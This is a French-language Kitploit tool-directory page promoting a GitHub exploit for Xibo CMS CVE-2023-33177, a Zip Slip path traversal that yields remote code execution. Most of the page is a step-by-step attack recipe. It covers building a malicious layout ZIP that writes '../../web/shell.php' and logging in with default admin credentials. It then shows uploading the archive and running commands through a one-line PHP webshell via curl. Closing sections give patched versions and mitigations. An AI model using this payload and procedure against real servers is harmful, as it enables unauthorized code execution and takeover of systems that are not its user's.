Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177 — Cet exploit démontre une **vulnérabilité de traversée de chemin** dans Xibo CMS (CVE-2023-33177) qui permet une exécution de code à distance via des importations de mise en page malveillantes. | Kitploit
Outils/GitHubGitHub/complexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubcomplexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177

Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177

Cet exploit démontre une **vulnérabilité de traversée de chemin** dans Xibo CMS (CVE-2023-33177) qui permet une exécution de code à distance via des importations de mise en page malveillantes.

Voir le dépôt
il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit RCE Zip Slip Xibo CMS CVE-2023-33177

Cet exploit démontre une vulnérabilité de traversée de chemin dans Xibo CMS (CVE-2023-33177) permettant l'exécution de code à distance via l'importation malveillante de layouts.

Détails de la vulnérabilité

CVE/Avis : CVE-2023-33177 Versions affectées :

  • Xibo CMS 1.8.0 - 2.3.16
  • Xibo CMS 3.0.0 - 3.3.4

Type de vulnérabilité : Traversée de chemin (Zip Slip) Impact : Exécution de code à distance (RCE)

Résumé technique

Xibo CMS permet aux utilisateurs authentifiés d'importer des fichiers de layout via des archives ZIP. La fonction d'importation ne valide pas correctement les chemins de fichiers dans le fichier mapping.json, permettant à un attaquant d'écrire des fichiers en dehors du répertoire de bibliothèque prévu à l'aide de séquences de traversée de chemin (../../).

Fonctionnement de l'exploit

  1. Crée une structure d'exportation de layout Xibo valide avec les fichiers JSON requis
  • Injecte une traversée de chemin dans mapping.json : utilise ../../web/shell.php comme chemin de fichier
  • Place une webshell dans le chemin traversé dans la structure ZIP à library/../../web/shell.php
  • Xibo extrait sans validation : résout en /var/www/cms/web/shell.php
  • Atteint RCE : la webshell est accessible à la racine web
  • La chaîne de vulnérabilité

    root@kitploit:~
    Zip contient : library/../../web/shell.php
    Xibo lit :    library/ + ../../web/shell.php (depuis mapping.json)
    Xibo écrit :  /var/www/cms/library/temp/ + ../../web/shell.php
    Résultat :    /var/www/cms/web/shell.php ← Webshell dans la racine web !
    

    Utilisation

    Générer l'exploit

    root@kitploit:~
    python3 create_exploit.py
    

    Ceci crée exploit.zip contenant le paquet de layout malveillant.

    Étapes d'exploitation

    1. Accédez à Xibo CMS et connectez-vous avec les identifiants (par défaut : xibo_admin / password)
    2. Naviguez vers Importation : Design → Layouts → Importer
    3. Téléchargez exploit.zip
    4. Ignorez les éventuelles erreurs JSON - la webshell a déjà été écrite sur le disque
    5. Exécutez des commandes via la webshell :
      root@kitploit:~
      curl 'http://localhost:8080/shell.php?cmd=id'
      

    Structure du fichier

    L'exploit ZIP contient :

    root@kitploit:~
    exploit.zip
    ├── layout.json          # Définition de layout Xibo valide
    ├── playlist.json        # Playlist vide (déclenche l'import JSON)
    ├── mapping.json         # Contient la charge utile de traversée de chemin
    └── library/
        └── ../../web/
            └── shell.php    # Webshell PHP (extrait vers la racine web)
    

    Fonctionnalité de la webshell

    La webshell intégrée est minimale :

    root@kitploit:~
    <?php system($_GET["cmd"]); ?>
    

    Accédez-y via : http://<cible>/shell.php?cmd=<commande>

    Mitigation

    Versions corrigées :

    • Mettez à jour vers Xibo CMS 2.3.17+ (pour la branche 2.x)
    • Mettez à jour vers Xibo CMS 3.3.5+ (pour la branche 3.x)

    Stratégies d'atténuation :

    1. Validez tous les chemins de fichiers dans les archives ZIP avant extraction
    2. Rejetez les chemins contenant .. ou les chemins absolus
    3. Utilisez des méthodes d'extraction sécurisées empêchant la traversée de répertoire
    4. Implémentez une validation d'entrée appropriée sur la fonctionnalité d'importation
    5. Limitez les autorisations de téléchargement de fichiers aux seuls utilisateurs authentifiés et autorisés

    Avis légal et éthique

    Cet exploit est fourni pour :

    • Des fins éducatives
    • Les compétitions CTF
    • Les tests de sécurité autorisés
    • La recherche défensive en sécurité

    N'utilisez pas cet exploit contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test.

    Références

    • Avis : GHSA-jj27-x85q-crqv
    • Xibo CMS : https://xibo.org.uk/
    • Vulnérabilité Zip Slip : https://security.snyk.io/research/zip-slip-vulnerability
    • CVE-2023-33177 : https://nvd.nist.gov/vuln/detail/CVE-2023-33177

    Auteur

    complexusprada Novembre 2025

    Télécharger l’outil